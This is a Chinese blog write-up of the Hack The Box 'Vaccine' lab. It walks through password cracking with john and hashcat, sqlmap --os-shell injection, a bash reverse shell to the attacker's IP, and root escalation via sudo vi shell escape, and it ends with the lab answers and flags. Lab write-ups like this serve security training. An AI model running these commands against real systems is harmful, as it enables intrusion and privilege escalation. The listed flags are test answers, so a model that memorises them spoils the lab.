HTB_Vaccine之通过root权限的vi提权

已于 2023-02-08 13:42:29 修改
阅读量1.1k 收藏
点赞数 2
分类专栏: # startpoint 文章标签: 安全 网络安全
于 2022-08-30 15:11:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/126604517
版权

zip解密 sqlmap获取os-shell root vi提权

文章目录

信息收集

-sV -v 有三个端口

在这里插入图片描述

尝试 ftp 登录,测试了几次,ftp/ftp 登录成功,这个安排就很合理,再多一次就不尝试了😀

在这里插入图片描述

查看文件,竟然有压缩包,看这名称,大概率是源码,下载

在这里插入图片描述

解压,竟然需要密码,很不错,这一步是我没想到的

在这里插入图片描述

尝试 ssh 登录,默认root 用户,输了几次密码,错误

在这里插入图片描述

查看80端口,一个登录接口

在这里插入图片描述

尝试弱口令,万能密码,sqlmap post 注入等,都是我们之前学过的,练习一下,都没有进展

扫目录,有一些发现

在这里插入图片描述

这个 license.txt 是授权信息,里面这个网址是一个前端模板网站,可能是这个网站使用了该作者的模板,在发现的js 文件里也可以看到,所以这些有什么用呢? 山穷水尽了,只有一个加密的压缩包

在这里插入图片描述

在这里插入图片描述

解密压缩包

没别的,暴破,使用在 Responder 接触过的 john 工具

zip2john backup.zip > hash.txt 

john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt

用了0.03s,太快了我还以为报错了

在这里插入图片描述

打开得到的 index.php ,能看到账号和加密的密码

在这里插入图片描述

又来活了,继续暴破,使用 hashcat

echo '2cb42f8734ea607eefed3b70af13bbd3'>hash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

也很快 2cb42f8734ea607eefed3b70af13bbd3:qwerty789 明显的弱口令,为什么之前 burp 没有试一下呢?

登录进去就是之前那个类似的页面,一个搜索功能,竟然是能用的功能,太惊喜了,这不得测试 sql注入?

在这里插入图片描述

sql注入测试

加了个单引号就很不争气的露出马脚了,以前讲过报错注入,但是我们最终的目的是获取一定权限,那就要用到 --os-shell

在这里插入图片描述

加上自己登录后的 cookie

sqlmap -u http://10.129.217.84/dashboard.php?search=fd --cookie="PHPSESSID=9hv260hbhh6qvl58v5gbpc1rb1" --os-shell

在这里插入图片描述

因为它的权限也很低,我连看文件都看不了,继续用 bash 命令连 nc

nc -lvnp 443
bash -c "bash -i >& /dev/tcp/10.10.16.6/443 0>&1"

在这里插入图片描述

此命令是获取完全交互式 shell ,不完全交互式顾名思义,无法使用某些功能,还容易误操作

python -c 'import pty; pty.spawn("/bin/bash")'

翻文件,这有个配置文件

postgres@vaccine:/var/lib/postgresql/11/main$ ls

在这里插入图片描述

user.txt,但是还有一个 root.txt 一般都是需要我们提权

在这里插入图片描述

这个反弹的 shell 断的也很快,继续看,翻到数据库连接账号密码

postgres@vaccine:/var/www/html$ cat dashboard.php

在这里插入图片描述

连接数据库提权

连接(我们之前没扫描到数据库的开放端口)

ssh postgres@10.129.217.84 
sudo -l

在这里插入图片描述

https://gtfobins.github.io/ 👈是用于绕过配置错误的系统中的本地安全限制的各种方法集合

我们可以以 root 权限编辑 pg_hba.conf 文件,输入下面语句,分两次编辑

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh     :wq 保存退出
:shell                 回车

发现已经变成 root 权限了

在这里插入图片描述

什么原理呢?

:set shell=/bin/sh 是设置 vim 使用哪个解释器

If the binary is allowed to run as superuser by sudo, it does not drop the elevated
privileges and may be used to access the file system, escalate or maintain privileged
access

还是要学一学英语,好多翻译的词不达意,我记得以前看提权的一些文章,当时看不懂,但是现在想起来,很类似,就是进程注入提权,它的原理是权限共享机制,结合起来解释就是如果可以使用 root 权限执行 vim 就相当于一个高权限进程,这样 vim 执行哪些操作都可以了,不知道这样想对不对?

:shell 这个命令我理解的是调用了之前设置的 shell ,因为属于 root 权限,所以获得了 root shell ,在 HTB_Oopsie 里也是 SUID 提权,也是执行了 /bin/sh 这个命令, 那个是通过修改临时环境变量调用执行文件,这个是通过修改配置来调用…不纠结了,再学习学习后面总结吧

查看 root flag

在这里插入图片描述

答案

FTP
anonymous
backup.zip
zip2john
qwerty789
--os-shell
vi
ec9b13ca4d6229cd5cc1e09980965bf7
dd6e058e814260bc70e9bbdef2715849
重返太空
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[渗透测试]HTB-Vaccine
weixin_47224111的博客
11-17 1078
0x01 信息收集 nmap -sC -sV 10.129.41.14 发现21 ftp 22 ssh 80 web 端口开放 其中21端口允许anonymous匿名登录 0x02对22端口测试 ftp 10.129.41.14 anonymous 发现存在一个back.zip 文件 解压发现存在密码 使用zip2john backup.zip > hashes 将backup.zip 的哈希导出 john -wordlist=/usr/share/wordlists/rockyou.txt h
[渗透测试]HTB靶机-Vaccine
Y4tacker的博客
07-22 743
文章目录Vaccine Vaccine 首先nmap -sC -sV 10.10.10.46 发现前台是一个登陆界面,尝试ftp登录ftpuser / mc@F1l3ZilL4 输入dir拿到源码 尝试下载 通过爆破得到密码741852963 拿到源码 拿到2cb42f8734ea607eefed3b70af13bbd3去尝试md5撞库 成功进入后台 发现存在sql注入 这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭 输入bash -c 'bash -
DC-2(VI GIT提权)
E1even的博客
08-25 789
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权 kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
权限提升和维持
FisrtBqy的博客
03-30 1349
渗透测试中常见的权限提升和维持手段
vi-提权
最新发布
longwanlian的博客
01-19 538
(img-HUjOTdne-1705661798066)]发现可以使用vi命令,此命令存在提权(本质上属于sudo提权)此时以及提升了权限,具体能提升多少,看操作环境。先提权然后查看jerry账号。
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
Linux提权
热门推荐
m0_57856283的博客
03-12 1万+
将这个虚拟文件导入虚拟机 开机默认没密码 账号:Bob 密码:secret root账号密码secret123 进去之后是这样的 我们先查看他的ip地址 这里我们看到他是没有IP地址的 我们先切换到root账户 进来之后需要改一个配置文件 然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机,注意,我们用普通用户远程过去 ssh bob@192.168.179.138 我们可以看到他已经远程了过来 过来之后我们可以先·看看他是什...
常用Linux提权(非漏洞)
Thegentlest的博客
08-31 4667
编译如下文件并添加SUID权限,在普通用户下执行该文件即可获得root的shell。}Note:上述SUID提权只是一部分并不全面,如需更多SUID提权详细信息可以参考如下链接GTFOBins。二、sudo命令提权当sudoers文件中某些用户包含某些命令的sudo权限时,可能导致提权问题发生。sudo -l查看当前用户有哪些sudo权限1.git执行!/bin/bash可以直接提权成功,less、man同理。...
# HTB-Tier2- Vaccine
32bin的博客
11-18 1033
WebNetworkVulnerability AssessmentDatabasesInjectionCustom ApplicationsProtocolsSource Code AnalysisApachePostgreSQLFTPPHPPenetration Tester Level 1ReconaisancePassword CrackingSUDO ExploitationSQL InjectionRemote Code ExecutionClear Text CredentialsAnonym
执行chmod u+s /bin/vim命令后,如何从普通用户test提权到管理员root?
qq_42735101的博客
04-04 5502
执行chmod u+s /bin/vim命令后,如何从普通用户test提权到管理员root? suid? 提权方法1: 修改sudoers文件,添加test权限行. vim /etc/sudoers sudo su - 提权方法2: 修改passwd文件,将test行UID改为0.
linux提权
ccssggoo的博客
06-30 3744
linux提权的各种方法
DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vi提权,git提权
single_g_l的博客
03-17 2689
目录 一. 环境 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现 02.访问地址192.168.1.8:80 03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件 04. 配置hosts文件,再次访问,拿到flag1 ​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2 01. 使用cewl生成密码 02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户 03. wpscan爆破拿到..
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1989
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
linux笔记之 vi编辑器和用户的配置文件及提权
Key_book(句芒安全实验室)
05-03 1394
vi编辑器3种模式, 命令模式 dd 删除整行 yy 复制整行 p 粘贴 x 删除光标所处的字符 插入模式 a 在光标后插入 i 在光标前 o 换行输入 末行模式 : 切换到末行模式 :set nu 显示行号 :set nonu 不显示行号 用户信息存放位置 /etc/passwd 用户和群组密码存放位置 /etc/shadow 在centos6 中普通用...
Linix提权(一)
qq_40327508的博客
09-23 953
SUID 提权 什么是suid?suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。需要注意的是,只有程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。 常见的可用来提权的Linux 可执行文件有: Nmap, Vim, find, bash, more, less, nano, cp 查看可以suid 提权的可执行文件 find / -pe
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值